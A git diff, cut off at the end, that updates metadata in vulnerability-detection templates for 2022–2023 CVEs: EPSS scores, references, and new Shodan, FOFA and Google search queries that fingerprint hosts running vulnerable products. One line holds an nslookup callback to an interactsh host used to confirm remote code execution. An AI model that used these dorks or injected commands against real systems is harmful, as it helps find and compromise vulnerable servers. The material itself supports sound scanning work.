cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings http: diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index a1ea1170f4..359b193a5a 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -27,6 +27,7 @@ info: vendor: hitachi product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 + fofa-query: icon_hash=1749354953 tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi http: diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 6a3a117619..4f0e01014a 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44290 cwe-id: CWE-89 - epss-score: 0.01336 - epss-percentile: 0.8578 + epss-score: 0.0091 + epss-percentile: 0.82781 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index f56af58d56..765fc77d75 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -14,13 +14,15 @@ info: - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad - https://wordpress.org/plugins/fontsy/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4447 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4447 cwe-id: CWE-89 - epss-score: 0.03134 - epss-percentile: 0.9009 + epss-score: 0.04713 + epss-percentile: 0.92631 cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 0348ce8bc0..0e14af4ba6 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -30,6 +30,8 @@ info: vendor: control-webpanel product: webpanel shodan-query: http.title:"Login | Control WebPanel" + fofa-query: title="login | control webpanel" + google-query: intitle:"login | control webpanel" tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel http: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index a969924eae..50b56671f4 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -29,6 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index c04b5a31c7..6d3f685a3d 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -27,6 +27,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index c7a0067ab7..0f7481cd1c 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -29,6 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 0aed280f8d..87985331b8 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2022-44948 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38514 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 0360fbb3cf..ef529d9285 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -28,6 +28,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index c6c75dba21..191c90351e 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -28,6 +28,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 6e5a05dfbc..6fefe8f747 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2022-44951 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 1fbf828fb0..f0c9738bde 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -28,6 +28,8 @@ info: max-request: 4 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index d6cae7559b..4b9c6a44cd 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-44957 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 1a67257e6a..462c4d2f12 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-45354 - epss-score: 0.00408 - epss-percentile: 0.73349 + epss-score: 0.00492 + epss-percentile: 0.7614 cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: download_monitor framework: wordpress shodan-query: html:"/wp-content/plugins/download-monitor/" + fofa-query: body="/wp-content/plugins/download-monitor/" tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp http: diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index 7918ee902b..62f5c91dc9 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -28,6 +28,8 @@ info: product: stock_ticker framework: wordpress publicwww-query: "/wp-content/plugins/stock-ticker/" + shodan-query: http.html:/wp-content/plugins/stock-ticker/ + fofa-query: body=/wp-content/plugins/stock-ticker/ tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss http: diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 7b9cc20217..a473a14b69 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-45805 cwe-id: CWE-89 epss-score: 0.00486 - epss-percentile: 0.75524 + epss-percentile: 0.76005 cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 3c988bbd4b..3697e93e1b 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-45917 cwe-id: CWE-601 epss-score: 0.00221 - epss-percentile: 0.60222 + epss-percentile: 0.60187 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: ilias product: ilias shodan-query: http.html:"ILIAS" + fofa-query: body="ilias" tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss http: diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 8e3f8ca4de..eb8bab2b14 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-306 - epss-score: 0.00908 - epss-percentile: 0.82406 + epss-score: 0.01085 + epss-percentile: 0.84299 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: kubeview_project product: kubeview shodan-query: http.title:"KubeView" + fofa-query: icon_hash=-379154636 + google-query: intitle:"kubeview" tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project http: diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index ef22ee023e..4ea36a824f 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 - epss-score: 0.02743 - epss-percentile: 0.90317 + epss-score: 0.02229 + epss-percentile: 0.89506 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index 723262ce8d..a5700101bc 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-46073 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.38558 + epss-percentile: 0.39756 cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index d3e88d94ac..e4d0b209bd 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -30,6 +30,8 @@ info: vendor: cacti product: cacti shodan-query: title:"Login to Cacti" + fofa-query: icon_hash="-1797138069" + google-query: intitle:"cacti" tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index ee261a0b05..32c0b9aed8 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -30,6 +30,7 @@ info: vendor: niceforyou product: linear_emerge_e3_access_control_firmware shodan-query: http.html:"Linear eMerge" + fofa-query: body="linear emerge" tags: cve,cve2022,xss,emerge,linear,niceforyou http: diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 142020dcbe..df7855cbc2 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -30,6 +30,7 @@ info: vendor: linuxfoundation product: harbor shodan-query: http.favicon.hash:657337228 + fofa-query: icon_hash=657337228 tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation http: diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 397e6d5a06..2b26609a94 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -12,13 +12,15 @@ info: - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities - https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33 - https://nvd.nist.gov/vuln/detail/CVE-2022-46888 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-46888 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40602 + epss-score: 0.00143 + epss-percentile: 0.50061 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +28,7 @@ info: vendor: nexusphp product: nexusphp shodan-query: http.favicon.hash:-582931176 + fofa-query: icon_hash=-582931176 tags: cve,cve2022,nexus,php,nexusphp,xss http: diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 1cc5c60c65..899d732f10 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46934 cwe-id: CWE-79 - epss-score: 0.05604 - epss-percentile: 0.92519 + epss-score: 0.01051 + epss-percentile: 0.84009 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index 7e75887974..f27b2580d7 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-47002 cwe-id: CWE-863 epss-score: 0.0395 - epss-percentile: 0.91808 + epss-percentile: 0.91996 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index efd1c30340..b0e61e055a 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-47075 - epss-score: 0.00614 - epss-percentile: 0.76423 + epss-score: 0.014 + epss-percentile: 0.86401 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 79ca1ad0db..8f322aad70 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47615 cwe-id: CWE-434 - epss-score: 0.01111 - epss-percentile: 0.84217 + epss-score: 0.01795 + epss-percentile: 0.88096 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: product: learnpress framework: wordpress publicwww-query: "/wp-content/plugins/learnpress" + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress http: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 57cb7e14bf..b7cc1fbf5b 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 - https://github.com/top-think/framework/compare/v6.0.13...v6.0.14 - https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47945 cwe-id: CWE-22 - epss-score: 0.03747 - epss-percentile: 0.90906 + epss-score: 0.04137 + epss-percentile: 0.92167 cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +31,7 @@ info: product: thinkphp shodan-query: title:"Thinkphp" fofa-query: header="think_lang" + google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,lfi http: diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index d94cd6858d..733f3c9c93 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -29,6 +29,8 @@ info: vendor: zohocorp product: manageengine_access_manager_plus shodan-query: title:"ManageEngine" + fofa-query: title="manageengine" + google-query: intitle:"manageengine" tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 0128412d08..9eb86b1a78 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -20,14 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47986 cwe-id: CWE-502 - epss-score: 0.9223 - epss-percentile: 0.98769 - cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* + epss-score: 0.95924 + epss-percentile: 0.99459 + cpe: cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: ibm - product: aspera_faspex + vendor: linux + product: linux_kernel shodan-query: html:"Aspera Faspex" tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 3ddb48c252..61a7b5fd56 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -28,6 +28,8 @@ info: vendor: opencats product: opencats shodan-query: title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 7684a3ebc6..ccbc0f2b32 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -30,6 +30,7 @@ info: vendor: wavlink product: wl-wn530h4_firmware shodan-query: http.favicon.hash:-1350437236 + fofa-query: icon_hash=-1350437236 tags: cve2022,cve,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index bf7df1101d..5871dedba4 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48197 cwe-id: CWE-79 - epss-score: 0.0012 - epss-percentile: 0.45243 + epss-score: 0.00421 + epss-percentile: 0.74161 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: yui_project product: yui shodan-query: html:"bower_components/yui2/" + fofa-query: body="bower_components/yui2/" tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project http: diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 15c127aa44..4dc3cc0ba6 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f - https://nvd.nist.gov/vuln/detail/CVE-2022-4897 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4897 cwe-id: CWE-79 - epss-score: 0.00289 - epss-percentile: 0.65597 + epss-score: 0.00486 + epss-percentile: 0.75995 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 8528e84fbe..0a29570785 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8 - https://wordpress.org/plugins/simple-urls/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0099 + - http://packetstormsecurity.com/files/176983/WordPress-Simple-URLs-Cross-Site-Scripting.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32657 + epss-score: 0.00109 + epss-percentile: 0.43829 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: getlasso product: simple_urls framework: wordpress - tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso + tags: wpscan,packetstorm,cve,cve2023,xss,simple-urls,authenticated,wordpress,wp,wp-plugin,getlasso http: - raw: diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index abfe116aa8..3d15ba075e 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -21,15 +21,17 @@ info: cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 - epss-score: 0.34658 - epss-percentile: 0.96997 - cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* + epss-score: 0.29128 + epss-percentile: 0.96882 + cpe: cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: sonicwall - product: sma1000_firmware + product: sma1000 shodan-query: title:"Appliance Management Console Login" + fofa-query: title="appliance management console login" + google-query: intitle:"appliance management console login" tags: cve2023,cve,sonicwall,lfi,sma1000 http: diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index 62bb1475b4..b001cae206 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -7,7 +7,7 @@ info: description: | The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains. remediation: Fixed in 1.9.1 - reference: | + reference: |- - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/ - https://github.com/im-hanzou/EVCer - https://github.com/nomi-sec/PoC-in-GitHub @@ -17,13 +17,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-0159 - epss-score: 0.00199 - epss-percentile: 0.56869 + epss-score: 0.01059 + epss-percentile: 0.84061 cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:* metadata: vendor: wprealize product: extensive_vc_addons_for_wpbakery_page_builder framework: wordpress + shodan-query: http.html:/wp-content/plugins/extensive-vc-addon/ + fofa-query: body=/wp-content/plugins/extensive-vc-addon/ publicwww-query: "/wp-content/plugins/extensive-vc-addon/" tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index b5fbe5c507..883795acfc 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0236 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45193 + epss-percentile: 0.46131 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,9 @@ info: vendor: themeum product: tutor_lms framework: wordpress + shodan-query: http.html:/wp-content/plugins/tutor/ + fofa-query: body=/wp-content/plugins/tutor/ + publicwww-query: /wp-content/plugins/tutor/ tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum http: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 9407993ab9..43fd326232 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0297 cwe-id: CWE-94 - epss-score: 0.35807 - epss-percentile: 0.96764 + epss-score: 0.50964 + epss-percentile: 0.97545 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: pyload product: pyload shodan-query: html:"pyload" + fofa-query: title="login - pyload" + google-query: intitle:"login - pyload" zoomeye-query: app:"pyLoad" tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast variables: diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index f690848cd6..d43bf8dfa8 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0334 cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.40094 + epss-score: 0.00119 + epss-percentile: 0.46131 cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: shortpixel product: shortpixel_adaptive_images framework: wordpress + shodan-query: http.html:/wp-content/plugins/shortpixel-adaptive-images/ + fofa-query: body=/wp-content/plugins/shortpixel-adaptive-images/ publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/ tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 3f52acf9d1..b06b0d9466 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 - https://nvd.nist.gov/vuln/detail/CVE-2023-0448 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/JoshuaMart/JoshuaMart classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32657 + epss-score: 0.00119 + epss-percentile: 0.46131 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +28,8 @@ info: vendor: matbao product: wp_helper_premium framework: wordpress + shodan-query: http.html:/wp-content/plugins/wp-helper-lite + fofa-query: body=/wp-content/plugins/wp-helper-lite publicwww-query: "/wp-content/plugins/wp-helper-lite" tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 98d83b6ae2..a6397dc7fa 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -19,8 